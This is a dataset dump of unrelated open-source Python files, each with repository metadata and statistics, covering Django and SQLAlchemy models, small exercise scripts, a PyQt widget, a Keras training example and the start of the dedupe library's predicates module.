| 46.142857 | 81 | 0.786378 | 73 | 646 | 6.849315 | 0.356164 | 0.1 | 0.15 | 0.12 | 0.35 | 0.35 | 0.35 | 0 | 0 | 0 | 0 | 0 | 0.120743 | 646 | 13 | 82 | 49.692308 | 0.880282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.454545 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7d9ceec989b719306e3f7cee0d0ba4ad567a567e | 876 | py | Python | fileupload/models.py | aih/pdf2html | 859d89da2d925bfa25efde76df55d07ebe37bfa7 | [
"MIT"
] | 5 | 2015-09-16T15:33:11.000Z | 2020-02-12T07:30:00.000Z | fileupload/models.py | aih/pdf2html | 859d89da2d925bfa25efde76df55d07ebe37bfa7 | [
"MIT"
] | null | null | null | fileupload/models.py | aih/pdf2html | 859d89da2d925bfa25efde76df55d07ebe37bfa7 | [
"MIT"
] | null | null | null | from django.db import models
class Pdf(models.Model):
# This is a small demo using FileField
file = models.FileField(upload_to="pdf")
slug = models.SlugField(max_length=50, blank=True)
def __unicode__(self):
return self.file
@models.permalink
def get_absolute_url(self):
return ('upload-new', )
def save(self, *args, **kwargs):
self.slug = self.file.name
super(Pdf, self).save(*args, **kwargs)
class Html(models.Model):
filename = models.SlugField(max_length=50, blank=True)
fileid = models.CharField(max_length=71, blank=False)
html = models.TextField()
def __unicode__(self):
return self.filename
@models.permalink
def get_absolute_url(self):
return ('viewhtml', [self.fileid] )
def save(self, *args, **kwargs):
super(Html, self).save(*args, **kwargs)
| 25.028571 | 58 | 0.648402 | 113 | 876 | 4.884956 | 0.415929 | 0.072464 | 0.065217 | 0.086957 | 0.442029 | 0.278986 | 0.278986 | 0.152174 | 0 | 0 | 0 | 0.008798 | 0.221461 | 876 | 34 | 59 | 25.764706 | 0.800587 | 0.041096 | 0 | 0.347826 | 0 | 0 | 0.02506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.26087 | false | 0 | 0.043478 | 0.173913 | 0.782609 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
7da0819bc00d41b9e8010b9353ccc89ab2e33407 | 1,094 | py | Python | todolist/todolist/wsgi.py | zhangshuoqi/todolist | d71dd779b0ca65ef24342daf980897be0b50a4b8 | [
"MIT"
] | null | null | null | todolist/todolist/wsgi.py | zhangshuoqi/todolist | d71dd779b0ca65ef24342daf980897be0b50a4b8 | [
"MIT"
] | null | null | null | todolist/todolist/wsgi.py | zhangshuoqi/todolist | d71dd779b0ca65ef24342daf980897be0b50a4b8 | [
"MIT"
] | null | null | null | """
WSGI config for todolist project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
sys.path.append('/django/todolist')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "todolist.settings")
application = get_wsgi_application()
"""
path = '/Django/todolist'
if path not in sys.path:
sys.path.insert(0, '/Django/todolist')
os.environ['DJANGO_SETTINGS_MODULE'] = 'todolist_app.settings'
#import django.core.handlers.wsgi #old version use
#application = django.core.handlers.wsgi.WSGIHandler()
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
"""
"""
from os.path import join,dirname,abspath
PROJECT_DIR = dirname(dirname(abspath(__file__)))
sys.path.insert(0,PROJECT_DIR)
os.environ["DJANGO_SETTINGS_MODULE"] = "todolist_app.settings"
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
"""
| 20.641509 | 78 | 0.772395 | 151 | 1,094 | 5.423841 | 0.384106 | 0.051282 | 0.131868 | 0.065934 | 0.34188 | 0.34188 | 0.34188 | 0.34188 | 0.173382 | 0.173382 | 0 | 0.00409 | 0.106033 | 1,094 | 52 | 79 | 21.038462 | 0.833333 | 0.195612 | 0 | 0 | 0 | 0 | 0.242291 | 0.096916 | 0 | 0 | 0 | 0.096154 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
7da46fcd7125320e662829d893b37097338e2a94 | 408 | py | Python | Py Learning/10. String/strings.py | MahmudX/TestSharp | 62d0edfbc420c808ca50d25daaee8f26258c3c28 | [
"MIT"
] | null | null | null | Py Learning/10. String/strings.py | MahmudX/TestSharp | 62d0edfbc420c808ca50d25daaee8f26258c3c28 | [
"MIT"
] | null | null | null | Py Learning/10. String/strings.py | MahmudX/TestSharp | 62d0edfbc420c808ca50d25daaee8f26258c3c28 | [
"MIT"
] | null | null | null | x = 'heLLo world'
print("Swap the case: " + x.swapcase())
print("Set all cast to upper: " + x.upper())
print("Set all cast to lower: " + x.lower())
print("Set all cast to lower aggresivly: " + x.casefold())
print("Set every word\'s first letter to upper: " + x.title())
print("Set the first word\'s first letter to upper in a sentence: " + x.capitalize())
x = x.split()
y = '--'.join(x)
print(y)
| 34 | 86 | 0.625 | 68 | 408 | 3.75 | 0.426471 | 0.156863 | 0.129412 | 0.176471 | 0.419608 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191176 | 408 | 11 | 87 | 37.090909 | 0.772727 | 0 | 0 | 0 | 0 | 0 | 0.523929 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.7 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
7dac7b70d9252009566c952ba40c25225087767d | 2,134 | py | Python | app/models/model.py | yashodharNellorepalli/casaone | 60efe5ad7449072c67b60b2e30feae94a8266967 | [
"MIT"
] | null | null | null | app/models/model.py | yashodharNellorepalli/casaone | 60efe5ad7449072c67b60b2e30feae94a8266967 | [
"MIT"
] | null | null | null | app/models/model.py | yashodharNellorepalli/casaone | 60efe5ad7449072c67b60b2e30feae94a8266967 | [
"MIT"
] | null | null | null | from app import db
class Rating(db.Model):
__tablename__ = 'ratings'
product_id = db.Column(db.String(255), primary_key=True)
order_id = db.Column(db.String(255), primary_key=True)
rating = db.Column(db.Integer)
class User(db.Model):
__tablename__ = 'users'
user_id = db.Column(db.Integer, autoincrement=True)
mobile = db.Column(db.String(10), primary_key=True)
email = db.Column(db.String(100))
name = db.Column(db.String(100))
class City(db.Model):
__tablename__ = 'cities'
city_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
name = db.Column(db.String(100))
class Hub(db.Model):
__tablename__ = 'hubs'
hub_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
name = db.Column(db.String(100))
city_id = db.Column(db.Integer, db.ForeignKey('City.city_id'))
latitude = db.Column(db.Float)
longitude = db.Column(db.Float)
class Order(db.Model):
__tablename__ = 'orders'
order_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
hub_id = db.Column(db.Integer, db.ForeignKey('Hub.hub_id'))
user_id = db.Column(db.Integer, db.ForeignKey('User.user_id'))
class OrderItem(db.Model):
__tablename__ = 'order_items'
order_id = db.Column(db.Integer, db.ForeignKey('Order.order_id'), primary_key=True)
product_id = db.Column(db.Integer, db.ForeignKey('Product.product_id'), primary_key=True)
rent_from = db.Column(db.DateTime)
rent_to = db.Column(db.DateTime)
class Product(db.Model):
__tablename__ = 'products'
product_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
name = db.Column(db.String(100))
description = db.Column(db.text)
class ProductMerchandising(db.Model):
__tablename__ = 'product_merchandising'
product_id = db.Column(db.Integer, db.ForeignKey('Product.product_id'), primary_key=True)
hub_id = db.Column(db.Integer, db.ForeignKey('Hub.hub_id'), primary_key=True)
price = db.Column(db.Float)
color = db.Column(db.String)
cost_of_assemble = db.Column(db.Float)
time_to_assemble = db.Column(db.Integer)
| 33.34375 | 93 | 0.705717 | 310 | 2,134 | 4.625806 | 0.167742 | 0.167364 | 0.209205 | 0.117155 | 0.549512 | 0.527894 | 0.502789 | 0.389819 | 0.389819 | 0.341004 | 0 | 0.012714 | 0.152296 | 2,134 | 63 | 94 | 33.873016 | 0.779989 | 0 | 0 | 0.12766 | 0 | 0 | 0.075914 | 0.009841 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7db5f87485637b3b946ba8c1387718c365c34ae1 | 505 | py | Python | uri/iniciante/1040.py | AllefLobo/AlgorithmsProblemsSolution | 7e89d43d0811c45944b1729385b2c36fa07a847f | [
"MIT"
] | 2 | 2016-07-24T17:46:35.000Z | 2017-04-16T03:01:54.000Z | uri/iniciante/1040.py | AllefLobo/AlgorithmsProblemsSolution | 7e89d43d0811c45944b1729385b2c36fa07a847f | [
"MIT"
] | null | null | null | uri/iniciante/1040.py | AllefLobo/AlgorithmsProblemsSolution | 7e89d43d0811c45944b1729385b2c36fa07a847f | [
"MIT"
] | null | null | null |
n1, n2, n3, n4 = map( float, raw_input().split() )
media = (n1*2 + n2*3 + n3*4 + n4*1)/10.0
print "Media: %.1f" %(media)
if media < 5.0 :
print "Aluno reprovado."
elif media >= 5.0 and media <= 6.9:
print "Aluno em exame."
exame = float(input())
print "Nota do exame: %.1f" %(exame)
media = (media + exame) / 2.0
if media >= 5.0:
print "Aluno aprovado."
else:
print "Aluno reprovado."
print "Media final: %.1f" %(media)
else:
print "Aluno aprovado."
| 24.047619 | 50 | 0.558416 | 77 | 505 | 3.649351 | 0.428571 | 0.177936 | 0.074733 | 0.064057 | 0.135231 | 0.135231 | 0 | 0 | 0 | 0 | 0 | 0.075269 | 0.263366 | 505 | 20 | 51 | 25.25 | 0.680108 | 0 | 0 | 0.352941 | 0 | 0 | 0.246032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.470588 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
7dcf706838b68b1d38b11950094454045366b553 | 755 | py | Python | baselines/gps/algorithm/policy/policy.py | DengYuelin/baselines-assembly | d40171845349395f0ed389d725873b389b08f94f | [
"MIT"
] | 1 | 2022-03-23T02:35:05.000Z | 2022-03-23T02:35:05.000Z | baselines/gps/algorithm/policy/policy.py | DengYuelin/baselines-assembly | d40171845349395f0ed389d725873b389b08f94f | [
"MIT"
] | null | null | null | baselines/gps/algorithm/policy/policy.py | DengYuelin/baselines-assembly | d40171845349395f0ed389d725873b389b08f94f | [
"MIT"
] | 3 | 2018-12-20T10:10:57.000Z | 2020-08-07T10:12:57.000Z | """ This file defines the base class for the policy. """
import abc
class Policy(object):
""" Computes actions from states/observations. """
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def act(self, x, obs, t, noise):
"""
Args:
x: State vector.
obs: Observation vector.
t: Time step.
noise: A dU-dimensional noise vector.
Returns:
A dU dimensional action vector.
"""
raise NotImplementedError("Must be implemented in subclass.")
def set_meta_data(self, meta):
"""
Set meta data for policy (e.g., domain image, multi modal observation sizes)
Args:
meta: meta data.
"""
return
| 26.034483 | 84 | 0.564238 | 84 | 755 | 5 | 0.654762 | 0.057143 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.341722 | 755 | 28 | 85 | 26.964286 | 0.84507 | 0.472848 | 0 | 0 | 0 | 0 | 0.116788 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7dd1385fce4456469e437e17f3cfb1bc870eaf43 | 786 | py | Python | generated-libraries/python/netapp/nfs/sec_flavor_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/nfs/sec_flavor_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/nfs/sec_flavor_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | from netapp.netapp_object import NetAppObject
class SecFlavorInfo(NetAppObject):
"""
Sec flavor info
"""
_flavor = None
@property
def flavor(self):
"""
Security_Flavor
Attributes: key, non-creatable, non-modifiable
"""
return self._flavor
@flavor.setter
def flavor(self, val):
if val != None:
self.validate('flavor', val)
self._flavor = val
@staticmethod
def get_api_name():
return "sec-flavor-info"
@staticmethod
def get_desired_attrs():
return [
'flavor',
]
def describe_properties(self):
return {
'flavor': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
| 21.833333 | 88 | 0.545802 | 74 | 786 | 5.648649 | 0.527027 | 0.043062 | 0.062201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.346056 | 786 | 35 | 89 | 22.457143 | 0.81323 | 0.099237 | 0 | 0.086957 | 0 | 0 | 0.092284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.043478 | 0.130435 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
7dd500e16e1d596d667a466202b6ad1ba0312497 | 148 | py | Python | Beginner/Chef and Interactive Contests (CHFINTRO)/interactive.py | anishsingh42/CodeChef | 50f5c0438516210895e513bc4ee959b9d99ef647 | [
"Apache-2.0"
] | 127 | 2020-10-13T18:04:35.000Z | 2022-02-17T10:56:27.000Z | Beginner/Chef and Interactive Contests (CHFINTRO)/interactive.py | anishsingh42/CodeChef | 50f5c0438516210895e513bc4ee959b9d99ef647 | [
"Apache-2.0"
] | 132 | 2020-10-13T18:06:53.000Z | 2021-10-17T18:44:26.000Z | Beginner/Chef and Interactive Contests (CHFINTRO)/interactive.py | anishsingh42/CodeChef | 50f5c0438516210895e513bc4ee959b9d99ef647 | [
"Apache-2.0"
] | 364 | 2020-10-13T18:04:52.000Z | 2022-03-04T14:34:53.000Z | N, r = map(int, input().split())
for i in range(N):
R = int(input())
if R>=r:
print('Good boi')
else:
print('Bad boi') | 16.444444 | 32 | 0.472973 | 24 | 148 | 2.916667 | 0.666667 | 0.057143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.324324 | 148 | 9 | 33 | 16.444444 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0.100671 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7dddc76be6a808097604e94406c897ed8ad95e0b | 530 | py | Python | bluebottle/segments/tests/factories.py | jayvdb/bluebottle | 305fea238e6aa831598a8b227223a1a2f34c4fcc | [
"BSD-3-Clause"
] | null | null | null | bluebottle/segments/tests/factories.py | jayvdb/bluebottle | 305fea238e6aa831598a8b227223a1a2f34c4fcc | [
"BSD-3-Clause"
] | null | null | null | bluebottle/segments/tests/factories.py | jayvdb/bluebottle | 305fea238e6aa831598a8b227223a1a2f34c4fcc | [
"BSD-3-Clause"
] | null | null | null |
from builtins import object
import factory
from bluebottle.segments.models import Segment, SegmentType
class SegmentTypeFactory(factory.DjangoModelFactory):
class Meta(object):
model = SegmentType
name = factory.Faker('word')
is_active = True
class SegmentFactory(factory.DjangoModelFactory):
class Meta(object):
model = Segment
name = factory.Faker('word')
alternate_names = factory.List([
factory.Faker('word')
])
type = factory.SubFactory(SegmentTypeFactory)
| 18.275862 | 59 | 0.703774 | 53 | 530 | 7 | 0.509434 | 0.097035 | 0.12938 | 0.183288 | 0.242588 | 0.242588 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207547 | 530 | 28 | 60 | 18.928571 | 0.883333 | 0 | 0 | 0.25 | 0 | 0 | 0.022684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
814d4633d8d3d1f37a3818a0b3be01c39beb06cf | 247 | py | Python | apps/user/paginations.py | ahojcn/bvideo | 4211b42bfab312587776c2dc915fba39ebf6e940 | [
"Apache-2.0"
] | 5 | 2019-08-09T15:32:15.000Z | 2019-08-18T11:09:37.000Z | apps/user/paginations.py | ahojcn/bvideo | 4211b42bfab312587776c2dc915fba39ebf6e940 | [
"Apache-2.0"
] | null | null | null | apps/user/paginations.py | ahojcn/bvideo | 4211b42bfab312587776c2dc915fba39ebf6e940 | [
"Apache-2.0"
] | null | null | null | from rest_framework.pagination import PageNumberPagination
class UserListPagination(PageNumberPagination):
"""
获取用户列表的分页器
"""
page_size = 64
page_query_param = "page"
page_size_query_param = "size"
max_page_size = 64
| 20.583333 | 58 | 0.720648 | 26 | 247 | 6.5 | 0.576923 | 0.142012 | 0.118343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020408 | 0.206478 | 247 | 11 | 59 | 22.454545 | 0.841837 | 0.040486 | 0 | 0 | 0 | 0 | 0.036199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
81686a6c2135410bac892e70dade334ed310e976 | 2,259 | py | Python | study_roadmaps/python_sample_examples/keras/7_switch_mode/eval_train_eval.py | Shreyashwaghe/monk_v1 | 4ee4d9483e8ffac9b73a41f3c378e5abf5fc799b | [
"Apache-2.0"
] | 7 | 2020-07-26T08:37:29.000Z | 2020-10-30T10:23:11.000Z | study_roadmaps/python_sample_examples/keras/7_switch_mode/eval_train_eval.py | mursalfk/monk_v1 | 62f34a52f242772186ffff7e56764e958fbcd920 | [
"Apache-2.0"
] | 9 | 2020-01-28T21:40:39.000Z | 2022-02-10T01:24:06.000Z | study_roadmaps/python_sample_examples/keras/7_switch_mode/eval_train_eval.py | mursalfk/monk_v1 | 62f34a52f242772186ffff7e56764e958fbcd920 | [
"Apache-2.0"
] | 1 | 2020-10-07T12:57:44.000Z | 2020-10-07T12:57:44.000Z | import os
import sys
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
ktf = prototype(verbose=1);
ktf.Prototype("sample-project-1", "sample-experiment-1");
ktf.Default(dataset_path="../../../monk/system_check_tests/datasets/dataset_cats_dogs_train",
model_name="resnet50", freeze_base_network=True, num_epochs=2);
######################################## Switch To Eval Mode ########################################
ktf.Switch_Mode(eval_infer=True)
#####################################################################################################
#####################################Evaluate on eval dataset ####################################
ktf.Dataset_Params(dataset_path="../../../monk/system_check_tests/datasets/dataset_cats_dogs_eval");
ktf.Dataset();
accuracy, class_based_accuracy = ktf.Evaluate();
#####################################################################################################
######################################## Switch To Train Mode ########################################
ktf.Switch_Mode(train=True)
#####################################################################################################
##################################### Train ###########################################
ktf.update_dataset(dataset_path=["../../../monk/system_check_tests/datasets/dataset_cats_dogs_train",
"../../../monk/system_check_tests/datasets/dataset_cats_dogs_eval"]);
ktf.Dataset(); #Can also use ktf.Reload() here
ktf.Train();
#####################################################################################################
######################################## Switch To Eval Mode ########################################
ktf.Switch_Mode(eval_infer=True)
#####################################################################################################
#####################################Evaluate on eval dataset ####################################
ktf.Dataset_Params(dataset_path="../../../monk/system_check_tests/datasets/dataset_cats_dogs_eval");
ktf.Dataset();
accuracy, class_based_accuracy = ktf.Evaluate();
##################################################################################################### | 34.227273 | 102 | 0.389553 | 165 | 2,259 | 5.054545 | 0.315152 | 0.059952 | 0.089928 | 0.119904 | 0.651079 | 0.651079 | 0.651079 | 0.651079 | 0.651079 | 0.651079 | 0 | 0.002814 | 0.05622 | 2,259 | 66 | 103 | 34.227273 | 0.388368 | 0.065958 | 0 | 0.409091 | 0 | 0 | 0.36583 | 0.310811 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
816f8a4a6aea42cc16b1248d7d53e2fbd8c89bcd | 1,243 | py | Python | ui/QDoubleSpinBoxWithFocus.py | ionicsolutions/eframe | 9129312231505afbfca5a780b0003a30fac2ba12 | [
"Apache-2.0"
] | null | null | null | ui/QDoubleSpinBoxWithFocus.py | ionicsolutions/eframe | 9129312231505afbfca5a780b0003a30fac2ba12 | [
"Apache-2.0"
] | null | null | null | ui/QDoubleSpinBoxWithFocus.py | ionicsolutions/eframe | 9129312231505afbfca5a780b0003a30fac2ba12 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# (c) 2017 Kilian Kluge
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PyQt4 import QtCore, QtGui
class QDoubleSpinBoxWithFocus(QtGui.QDoubleSpinBox):
"""Customized :class:`QtGui.QDoubleSpinBox` where the focus events
are mapped to signals."""
receivedFocus = QtCore.pyqtSignal()
lostFocus = QtCore.pyqtSignal()
def __init__(self, parent):
super(QDoubleSpinBoxWithFocus, self).__init__(parent)
def focusInEvent(self, event):
super(QDoubleSpinBoxWithFocus, self).focusInEvent(event)
self.receivedFocus.emit()
def focusOutEvent(self, event):
super(QDoubleSpinBoxWithFocus, self).focusOutEvent(event)
self.lostFocus.emit()
| 35.514286 | 76 | 0.718423 | 153 | 1,243 | 5.784314 | 0.607843 | 0.067797 | 0.108475 | 0.036158 | 0.092655 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00995 | 0.191472 | 1,243 | 34 | 77 | 36.558824 | 0.870647 | 0.541432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8193a14707d2bdc2ff231be68f34c63656ae5bb5 | 129 | py | Python | exercicios_python/Exercicio_049.py | GabsOrtega/logica-python | 6f4e752d0796c9bf70be8f7108bc3bd49d877709 | [
"MIT"
] | null | null | null | exercicios_python/Exercicio_049.py | GabsOrtega/logica-python | 6f4e752d0796c9bf70be8f7108bc3bd49d877709 | [
"MIT"
] | null | null | null | exercicios_python/Exercicio_049.py | GabsOrtega/logica-python | 6f4e752d0796c9bf70be8f7108bc3bd49d877709 | [
"MIT"
] | null | null | null | n = int(input('Digite o número que deseja a tabuada: '))
for c in range(1, 11):
print('{} X {} = {}'.format(n, c, n*c))
| 25.8 | 57 | 0.534884 | 23 | 129 | 3 | 0.826087 | 0.057971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030612 | 0.24031 | 129 | 4 | 58 | 32.25 | 0.673469 | 0 | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
819e23f88590870ab14787207e91087d23c607e9 | 14,835 | py | Python | dedupe/predicates.py | fritshermans/dedupe | fd7e8757e88d1b52d8965dda86b81482ebc2e516 | [
"MIT"
] | 2,190 | 2017-04-17T18:24:41.000Z | 2022-03-31T03:36:24.000Z | dedupe/predicates.py | fritshermans/dedupe | fd7e8757e88d1b52d8965dda86b81482ebc2e516 | [
"MIT"
] | 433 | 2017-04-17T22:46:45.000Z | 2022-03-29T04:08:40.000Z | dedupe/predicates.py | fritshermans/dedupe | fd7e8757e88d1b52d8965dda86b81482ebc2e516 | [
"MIT"
] | 345 | 2017-04-21T09:11:50.000Z | 2022-03-31T11:12:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import math
import itertools
import string
import abc
from doublemetaphone import doublemetaphone
from dedupe.cpredicates import ngrams, initials
import dedupe.tfidf as tfidf
import dedupe.levenshtein as levenshtein
from typing import Sequence, Callable, Any, Tuple, Set
from dedupe._typing import RecordDict
words = re.compile(r"[\w']+").findall
integers = re.compile(r"\d+").findall
start_word = re.compile(r"^([\w']+)").match
two_start_words = re.compile(r"^([\w']+\s+[\w']+)").match
start_integer = re.compile(r"^(\d+)").match
alpha_numeric = re.compile(r"(?=\w*\d)[a-zA-Z\d]+").findall
PUNCTABLE = str.maketrans("", "", string.punctuation)
def strip_punc(s):
return s.translate(PUNCTABLE)
class Predicate(abc.ABC):
def __iter__(self):
yield self
def __repr__(self):
return "%s: %s" % (self.type, self.__name__)
def __hash__(self):
try:
return self._cached_hash
except AttributeError:
h = self._cached_hash = hash(repr(self))
return h
def __eq__(self, other):
return repr(self) == repr(other)
def __len__(self):
return 1
@abc.abstractmethod
def __call__(self, record, **kwargs) -> tuple:
pass
def __add__(self, other: 'Predicate') -> 'CompoundPredicate':
if isinstance(other, CompoundPredicate):
return CompoundPredicate((self,) + tuple(other))
elif isinstance(other, Predicate):
return CompoundPredicate((self, other))
else:
raise ValueError('Can only combine predicates')
class SimplePredicate(Predicate):
type = "SimplePredicate"
def __init__(self, func: Callable[[Any], Tuple[str, ...]], field: str):
self.func = func
self.__name__ = "(%s, %s)" % (func.__name__, field)
self.field = field
def __call__(self, record: RecordDict, **kwargs) -> Tuple[str, ...]:
column = record[self.field]
if column:
return self.func(column)
else:
return ()
class StringPredicate(SimplePredicate):
def __call__(self, record: RecordDict, **kwargs):
column = record[self.field]
if column:
return self.func(" ".join(strip_punc(column).split()))
else:
return ()
class ExistsPredicate(Predicate):
type = "ExistsPredicate"
def __init__(self, field):
self.__name__ = "(Exists, %s)" % (field,)
self.field = field
@staticmethod
def func(column):
if column:
return ('1',)
else:
return ('0',)
def __call__(self, record, **kwargs):
column = record[self.field]
return self.func(column)
class IndexPredicate(Predicate):
def __init__(self, threshold, field):
self.__name__ = '(%s, %s)' % (threshold, field)
